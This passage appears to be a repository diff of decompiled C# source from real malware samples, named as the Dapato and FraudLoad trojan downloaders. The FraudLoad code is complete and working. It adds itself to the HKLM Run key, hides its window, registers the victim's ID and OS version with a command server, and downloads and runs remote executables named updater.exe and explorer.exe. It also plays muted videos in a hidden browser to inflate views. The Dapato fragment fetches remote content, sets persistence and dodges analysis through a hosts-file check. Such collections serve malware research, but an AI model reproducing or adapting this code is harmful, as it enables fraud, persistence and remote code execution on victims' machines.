return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1024, 1366), this.rnd.Next(768, 768));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Program.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDKCK}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/{56ab1832-9ffe-43ad-8f8b-23253f3aef61}
BIN
View File
Binary file not shown.
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/AssemblyInfo.cs
+16
View File
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyTitle("mute")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("air")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyProduct("mute")]
[assembly: AssemblyCopyright("Copyright © air 2010")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("88bfcd0a-bf33-474b-8188-e86f77d32965")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: RegistryPermission(SecurityAction.RequestMinimum, Create = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Write = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")]
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Form1.cs
+711
View File
@@ -0,0 +1,711 @@
// Decompiled with JetBrains decompiler
// Type: mute.Form1
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Threading;
using System.Web;
using System.Windows.Forms;
namespace mute
{
public class Form1 : Form
{
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_THREAD = 1;
private const int SET_FEATURE_ON_PROCESS = 2;
private const int SET_FEATURE_IN_REGISTRY = 4;
private const int SET_FEATURE_ON_THREAD_LOCALMACHINE = 8;
private const int SET_FEATURE_ON_THREAD_INTRANET = 16;
private const int SET_FEATURE_ON_THREAD_TRUSTED = 32;
private const int SET_FEATURE_ON_THREAD_INTERNET = 64;
private const int SET_FEATURE_ON_THREAD_RESTRICTED = 128;
private IContainer components = (IContainer) null;
private Panel panel1;
private Button button1;
private Panel panel2;
private WebBrowser web;
private TextBox txtUrl;
private CheckBox chkMute;
private Panel panel3;
private TextBox txtLog;
private CheckBox chkDouble;
private BackgroundWorker worker;
private Button btnSetting;
private CheckBox chkHide;
private Button btnDisableAutostart;
private Button button2;
private string APP_VER = "";
private string DATA_VER = "";
private string DATA = "";
private int START_NO = 0;
private string USERID = "";
private string MEMO = "";
private bool DONE = false;
private bool SupportMuteApplication = false;
private string URL = "";
private int PING_HITS = 5;
private int PING_SECONDS = 60;
private int DELAY = 0;
private bool LOG = false;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.panel1 = new Panel();
this.button2 = new Button();
this.btnDisableAutostart = new Button();
this.chkHide = new CheckBox();
this.btnSetting = new Button();
this.chkDouble = new CheckBox();
this.chkMute = new CheckBox();
this.txtUrl = new TextBox();
this.button1 = new Button();
this.panel2 = new Panel();
this.web = new WebBrowser();
this.panel3 = new Panel();
this.txtLog = new TextBox();
this.worker = new BackgroundWorker();
this.panel1.SuspendLayout();
this.panel2.SuspendLayout();
this.panel3.SuspendLayout();
this.SuspendLayout();
this.panel1.Controls.Add((Control) this.button2);
this.panel1.Controls.Add((Control) this.btnDisableAutostart);
this.panel1.Controls.Add((Control) this.chkHide);
this.panel1.Controls.Add((Control) this.btnSetting);
this.panel1.Controls.Add((Control) this.chkDouble);
this.panel1.Controls.Add((Control) this.chkMute);
this.panel1.Controls.Add((Control) this.txtUrl);
this.panel1.Controls.Add((Control) this.button1);
this.panel1.Dock = DockStyle.Top;
this.panel1.Location = new Point(0, 0);
this.panel1.Name = "panel1";
this.panel1.Size = new Size(604, 87);
this.panel1.TabIndex = 0;
this.button2.Location = new Point(167, 41);
this.button2.Name = "button2";
this.button2.Size = new Size(49, 23);
this.button2.TabIndex = 7;
this.button2.Text = "Nav";
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new EventHandler(this.button2_Click);
this.btnDisableAutostart.Location = new Point(222, 41);
this.btnDisableAutostart.Name = "btnDisableAutostart";
this.btnDisableAutostart.Size = new Size(136, 23);
this.btnDisableAutostart.TabIndex = 6;
this.btnDisableAutostart.Text = "Disable Autostart";
this.btnDisableAutostart.UseVisualStyleBackColor = true;
this.btnDisableAutostart.Click += new EventHandler(this.btnDisableAutostart_Click);
this.chkHide.AutoSize = true;
this.chkHide.Location = new Point(366, 16);
this.chkHide.Name = "chkHide";
this.chkHide.Size = new Size(48, 16);
this.chkHide.TabIndex = 5;
this.chkHide.Text = "Hide";
this.chkHide.UseVisualStyleBackColor = true;
this.chkHide.CheckedChanged += new EventHandler(this.chkHide_CheckedChanged);
this.btnSetting.Location = new Point(277, 12);
this.btnSetting.Name = "btnSetting";
this.btnSetting.Size = new Size(81, 23);
this.btnSetting.TabIndex = 4;
this.btnSetting.Text = "User Data";
this.btnSetting.UseVisualStyleBackColor = true;
this.btnSetting.Click += new EventHandler(this.btnSetting_Click);
this.chkDouble.AutoSize = true;
this.chkDouble.Checked = true;
this.chkDouble.CheckState = CheckState.Checked;
this.chkDouble.Location = new Point(502, 16);
this.chkDouble.Name = "chkDouble";
this.chkDouble.Size = new Size(96, 16);
this.chkDouble.TabIndex = 3;
this.chkDouble.Text = "Double Check";
this.chkDouble.UseVisualStyleBackColor = true;
this.chkMute.AutoSize = true;
this.chkMute.Checked = true;
this.chkMute.CheckState = CheckState.Checked;
this.chkMute.Location = new Point(420, 16);
this.chkMute.Name = "chkMute";
this.chkMute.Size = new Size(78, 16);
this.chkMute.TabIndex = 2;
this.chkMute.Text = "Auto Mute";
this.chkMute.UseVisualStyleBackColor = true;
this.txtUrl.Location = new Point(3, 14);
this.txtUrl.Name = "txtUrl";
this.txtUrl.Size = new Size(213, 21);
this.txtUrl.TabIndex = 1;
this.txtUrl.Text = "http://www.youtube.com/watch?v=WwfNexdaIdU&feature=topvideos";
this.button1.Location = new Point(222, 12);
this.button1.Name = "button1";
this.button1.Size = new Size(49, 23);
this.button1.TabIndex = 0;
this.button1.Text = "Go";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
this.panel2.Controls.Add((Control) this.web);
this.panel2.Dock = DockStyle.Fill;
this.panel2.Location = new Point(0, 87);
this.panel2.Name = "panel2";
this.panel2.Size = new Size(604, 98);
this.panel2.TabIndex = 1;
this.web.Dock = DockStyle.Fill;
this.web.Location = new Point(0, 0);
this.web.MinimumSize = new Size(20, 20);
this.web.Name = "web";
this.web.Size = new Size(604, 98);
this.web.TabIndex = 0;
this.web.ProgressChanged += new WebBrowserProgressChangedEventHandler(this.web_ProgressChanged);
this.web.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.web_DocumentCompleted);
this.panel3.Controls.Add((Control) this.txtLog);
this.panel3.Dock = DockStyle.Bottom;
this.panel3.Location = new Point(0, 185);
this.panel3.Name = "panel3";
this.panel3.Size = new Size(604, 137);
this.panel3.TabIndex = 3;
this.txtLog.Dock = DockStyle.Fill;
this.txtLog.Location = new Point(0, 0);
this.txtLog.Multiline = true;
this.txtLog.Name = "txtLog";
this.txtLog.Size = new Size(604, 137);
this.txtLog.TabIndex = 0;
this.worker.WorkerReportsProgress = true;
this.worker.DoWork += new DoWorkEventHandler(this.worker_DoWork);
this.worker.RunWorkerCompleted += new RunWorkerCompletedEventHandler(this.worker_RunWorkerCompleted);
this.worker.ProgressChanged += new ProgressChangedEventHandler(this.worker_ProgressChanged);
this.AutoScaleDimensions = new SizeF(6f, 12f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(604, 322);
this.Controls.Add((Control) this.panel2);
this.Controls.Add((Control) this.panel1);
this.Controls.Add((Control) this.panel3);
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Form1_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.panel2.ResumeLayout(false);
this.panel3.ResumeLayout(false);
this.panel3.PerformLayout();
this.ResumeLayout(false);
}
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public Form1() => this.InitializeComponent();
private void Nav(string url) => this.web.Navigate(url);
private void StopNav()
{
this.web.Stop();
while (this.web.IsBusy)
Thread.Sleep(2000);
}
private void RemoveAutoStart(string name)
{
RegistryKey localMachine = Registry.LocalMachine;
RegistryKey subKey = localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\");
try
{
subKey.DeleteValue(name);
localMachine.Close();
}
catch (Exception ex)
{
}
}
private bool AutoStart(string name, string path)
{
RegistryKey localMachine = Registry.LocalMachine;
bool flag = false;
try
{
localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\").SetValue(name, (object) path);
localMachine.Close();
flag = true;
}
catch (Exception ex)
{
int num = (int) MessageBox.Show("Please run this app as Administrator so it can be installed correctly...");
}
return flag;
}
protected override void SetVisibleCore(bool value)
{
if (this.IsHide())
{
base.SetVisibleCore(false);
this.init();
}
else
base.SetVisibleCore(true);
}
private void DoWork()
{
while (true)
{
this.SupportMuteApplication = this.MuteApplication();
string[] strArray = this.DATA.Split('\n');
int hits = 0;
int startNo = this.START_NO;
DateTime now = DateTime.Now;
for (int index1 = this.START_NO + 1; index1 < strArray.Length; ++index1)
{
try
{
string s = strArray[index1].Trim();
if (!(s == "") && !char.IsDigit(s, 0))
{
if (!s.StartsWith("http://", StringComparison.InvariantCultureIgnoreCase))
s = "http://" + s;
string str1 = s.Replace("http://il.", "http://www.");
this.DONE = false;
this.URL = str1.ToUpper();
this.worker.ReportProgress(0, (object) string.Format("No {0} video begin:{1}", (object) (startNo + 1), (object) str1));
bool flag = str1.StartsWith("http://www.youtube.com", StringComparison.InvariantCultureIgnoreCase);
if (!this.SupportMuteApplication && !flag)
{
++startNo;
this.worker.ReportProgress(0, (object) string.Format("Skip {0} on OS lower than vista!", (object) (startNo + 1)));
Thread.Sleep(500);
}
else
{
this.web.Invoke((Delegate) new Form1.NavTo(this.Nav), (object) str1);
for (int index2 = 0; !this.DONE && index2 < 60; ++index2)
Thread.Sleep(2000);
if (this.DONE)
this.worker.ReportProgress(0, (object) string.Format("Page load finished!Sleep {0} ms...", (object) this.DELAY));
else
this.worker.ReportProgress(0, (object) string.Format("Time out!Sleep {0} ms...", (object) this.DELAY));
Thread.Sleep(this.DELAY);
TimeSpan timeSpan = DateTime.Now - now;
if (this.DONE)
++hits;
this.LogLocal(string.Format("TS:{0},PingSecond:{1},Hits:{2},PingHits:{3}\r\n", (object) (int) timeSpan.TotalSeconds, (object) this.PING_SECONDS, (object) hits, (object) this.PING_HITS));
if (hits > this.PING_HITS || (int) timeSpan.TotalSeconds > this.PING_SECONDS)
{
string str2 = this.Ping(hits);
hits = 0;
now = DateTime.Now;
if (str2.Trim() == "config")
this.ConfigClient(this.USERID, this.MEMO);
}
System.IO.File.WriteAllText(this.GetProcessFile(), index1.ToString());
++startNo;
if (this.DONE)
this.worker.ReportProgress(0, (object) string.Format("No {0} video finished:{1}", (object) startNo, (object) str1));
else
this.worker.ReportProgress(0, (object) string.Format("No {0} video failed:{1}", (object) startNo, (object) str1));
}
}
}
catch (Exception ex)
{
this.worker.ReportProgress(0, (object) string.Format("Raise exception in worker loop:{0}", (object) ex.Message));
++startNo;
}
}
this.RefreshData();
this.START_NO = 0;
}
}
private void web_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
{
string upper1 = e.Url.AbsoluteUri.ToUpper();
bool flag = this.URL.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH");
if (flag && upper1.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH"))
{
int num1 = -99;
int num2 = 0;
this.Log(upper1);
while (num1 == -99 && num2 < 10)
{
++num2;
HtmlElement elementById = this.web.Document.GetElementById("movie_player");
try
{
num1 = (int) elementById.InvokeMember("getPlayerState");
elementById.InvokeMember("mute");
this.Log("Mute successfully!");
this.DONE = true;
}
catch (Exception ex)
{
this.Log("Mute failed:" + ex.Message + ",will try again...");
}
Thread.Sleep(300);
}
}
if (flag && this.DONE && this.chkDouble.Checked)
this.web.Navigate("javascript:document.getElementById('movie_player').mute();");
string upper2 = ((WebBrowser) sender).Document.Url.ToString().ToUpper();
if (flag || !(this.URL == upper1) && !(this.URL + "/" == upper1) || !(this.URL == upper2) && !(this.URL + "/" == upper2) || ((WebBrowser) sender).IsOffline)
return;
this.DONE = true;
}
private void LogLocal(string msg) => System.IO.File.AppendAllText(Path.Combine(Application.UserAppDataPath, "log.txt"), msg + Environment.NewLine);
private void FormLog(string msg)
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
}
private void Log(string msg)
{
if (this.LOG)
{
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) this.USERID, (object) this.MEMO, (object) HttpUtility.UrlEncode(msg));
WebClient webClient = new WebClient();
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
msg = msg + " #Log to server failed." + ex.Message;
}
}
if (this.txtLog.InvokeRequired)
{
this.txtLog.Invoke((Delegate) (() =>
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
}));
}
else
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
Application.DoEvents();
}
}
private void button1_Click(object sender, EventArgs e) => this.Go();
private void Go()
{
this.web.ScriptErrorsSuppressed = true;
Form1.CoInternetSetFeatureEnabled(21, 2, true);
string processFile = this.GetProcessFile();
this.START_NO = 0;
if (System.IO.File.Exists(this.GetProcessFile()))
{
string[] strArray = System.IO.File.ReadAllLines(processFile);
if (strArray.Length > 1)
int.TryParse(strArray[0], out this.START_NO);
}
this.worker.RunWorkerAsync();
}
private void web_ProgressChanged(object sender, WebBrowserProgressChangedEventArgs e)
{
}
private string Ping(int hits)
{
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/ping.php?user={0}&memo={1}&version={2}&profile={3}", (object) this.USERID, (object) this.MEMO, (object) "20110123", (object) Environment.OSVersion.VersionString);
if (hits > 0)
address = address + "&hits=" + hits.ToString();
return webClient.DownloadString(address);
}
private string GetUserDataPath() => Application.UserAppDataPath;
private string GetProcessFile() => this.GetUserDataPath() + "\\process.txt";
private string GetConfigFile() => this.GetUserDataPath() + "\\config.txt";
private string GetUserFile() => this.GetUserDataPath() + "\\user.txt";
private bool IsHide() => System.IO.File.Exists(Path.Combine(Application.UserAppDataPath, "hide.txt"));
private int GetAffiliateID()
{
FileStream fileStream = System.IO.File.OpenRead(Application.ExecutablePath);
fileStream.Seek(-1L, SeekOrigin.End);
return fileStream.ReadByte();
}
private void HideMe()
{
this.Opacity = 0.0;
this.ShowInTaskbar = false;
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
}
private void Form1_Load(object sender, EventArgs e)
{
this.Text = Application.ExecutablePath;
this.init();
}
private bool MuteApplication()
{
if (Environment.OSVersion.Version.Major <= 5)
return false;
Form1.SetVolume(0);
return true;
}
private bool UnMuteApplication()
{
if (Environment.OSVersion.Version.Major <= 5)
return false;
Form1.SetVolume((int) ushort.MaxValue);
return true;
}
[DllImport("winmm.dll")]
private static extern int waveOutGetVolume(IntPtr hwo, out uint dwVolume);
[DllImport("winmm.dll")]
private static extern int waveOutSetVolume(IntPtr hwo, uint dwVolume);
public static int GetVolume()
{
uint dwVolume = 0;
Form1.waveOutGetVolume(IntPtr.Zero, out dwVolume);
return (int) (ushort) (dwVolume & (uint) ushort.MaxValue) / 6553;
}
public static void SetVolume(int volume)
{
int num = 6553 * volume;
uint dwVolume = (uint) (num & (int) ushort.MaxValue | num << 16);
Form1.waveOutSetVolume(IntPtr.Zero, dwVolume);
}
public void Clean()
{
this.RemoveAutoStart("mute");
Directory.Delete(Application.UserAppDataPath, true);
}
public void ShowAffiateID()
{
int num = (int) MessageBox.Show(this.GetAffiliateID().ToString());
Application.Exit();
}
private void init()
{
string configFile = this.GetConfigFile();
if (System.IO.File.Exists(configFile))
{
string[] strArray = System.IO.File.ReadAllLines(configFile);
if (strArray.Length > 3)
{
this.APP_VER = strArray[0];
this.DATA_VER = strArray[2];
this.DATA = string.Join("\n", strArray, 4, strArray.Length - 4);
}
}
this.Log("Check upgrade app.ver20110123");
WebClient webClient = new WebClient();
string[] strArray1 = webClient.DownloadString("http://isthisactuallyadomain.info/check_update.php").Split('\n');
this.LogLocal("Generate updater");
string str1 = Path.Combine(Application.UserAppDataPath, "updater.exe");
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath)
{
if (!this.AutoStart("mute", str1))
{
Application.Exit();
}
else
{
if (!System.IO.File.Exists(str1))
{
webClient.DownloadFile(strArray1[1], str1);
this.Log("updater installed:" + str1);
}
this.GetUserID();
Process.Start(str1);
this.Log("launch updater ok" + str1);
Application.Exit();
}
}
else
{
if (this.IsHide())
this.HideMe();
this.GetUserID();
this.ConfigClient(this.USERID, this.MEMO);
this.Log("Config client ok.");
string str2 = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO));
string[] contents = str2.Split('\n');
this.Log("Check update info ok:" + str2);
string str3 = Path.Combine(Application.UserAppDataPath, "explorer.exe");
if (str3 != Application.ExecutablePath)
{
if (string.Compare(this.APP_VER, contents[0]) < 0)
{
webClient.DownloadFile(contents[1], str3);
this.Log("app upgraded:" + str3);
}
if (!System.IO.File.Exists(str3))
webClient.DownloadFile(contents[1], str3);
Process.Start(str3);
this.Log("launch app ok" + str3);
this.LogLocal("Launch app");
Application.Exit();
}
else
{
this.APP_VER = contents[0];
string str4 = contents[1];
string address = contents[3];
if (string.Compare(this.DATA_VER, contents[2]) < 0)
{
this.DATA = webClient.DownloadString(address);
this.DATA_VER = contents[2];
this.Log("Data upgraded:" + address);
}
System.IO.File.WriteAllLines(configFile, contents);
System.IO.File.AppendAllText(configFile, this.DATA);
this.Log("About to start the worker loop");
this.LogLocal("Start worker loop.ver20110123");
this.Go();
}
}
}
private void GetUserID()
{
this.LogLocal("Register or get user id.");
string userFile = this.GetUserFile();
if (System.IO.File.Exists(userFile))
{
string[] strArray = System.IO.File.ReadAllLines(userFile);
this.USERID = strArray[0];
this.MEMO = strArray[1];
}
else
{
this.Register("friend");
string[] contents = new string[2]
{
this.USERID,
this.MEMO
};
System.IO.File.WriteAllLines(userFile, contents);
}
this.Ping(0);
this.LogLocal("Open data file");
this.Log("Get userid&meo from :" + userFile);
}
private void ConfigClient(string userid, string memo)
{
string[] strArray = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/config.php?user={0}&memo={1}", (object) userid, (object) memo)).Split('\n');
int.TryParse(strArray[0].Trim(), out this.PING_SECONDS);
int.TryParse(strArray[1].Trim(), out this.PING_HITS);
if (strArray[2].Trim() == "Log")
this.LOG = true;
int.TryParse(strArray[3].Trim(), out this.DELAY);
this.DELAY *= 1000;
}
private void RefreshData()
{
try
{
WebClient webClient = new WebClient();
string[] contents = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO)).Split('\n');
if (contents.Length < 4)
return;
this.APP_VER = contents[0];
string str = contents[1];
string address = contents[3];
if (string.Compare(this.DATA_VER, contents[2]) < 0)
{
string configFile = this.GetConfigFile();
this.DATA = webClient.DownloadString(address);
this.DATA_VER = contents[2];
System.IO.File.WriteAllLines(configFile, contents);
System.IO.File.AppendAllText(configFile, this.DATA);
}
}
catch (Exception ex)
{
this.worker.ReportProgress(0, (object) ("Raise a exception in RefreshData:" + ex.Message));
}
}
private void Register(string affiliate)
{
this.MEMO = DateTime.Now.Ticks.ToString();
this.USERID = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/register.php?memo={0}&affiliate={1}&profile={2}", (object) this.MEMO, (object) affiliate, (object) Environment.OSVersion.VersionString)).Trim();
this.Log(string.Format("Register with server ok:{0},{1}", (object) this.USERID, (object) this.MEMO));
}
private void worker_DoWork(object sender, DoWorkEventArgs e) => this.DoWork();
private void worker_ProgressChanged(object sender, ProgressChangedEventArgs e) => this.Log((string) e.UserState);
private void worker_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e) => this.Log("Done!");
private void btnSetting_Click(object sender, EventArgs e) => Process.Start(Application.UserAppDataPath);
private void chkHide_CheckedChanged(object sender, EventArgs e)
{
if (!this.chkHide.Checked)
return;
this.WindowState = FormWindowState.Minimized;
this.HideMe();
}
private void btnDisableAutostart_Click(object sender, EventArgs e) => this.RemoveAutoStart("mute");
private void button2_Click(object sender, EventArgs e)
{
this.web.Stop();
this.web.Navigate(this.txtUrl.Text);
}
private delegate void NavTo(string url);
private delegate void StopWeb();
private delegate void UICode();
}
}
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
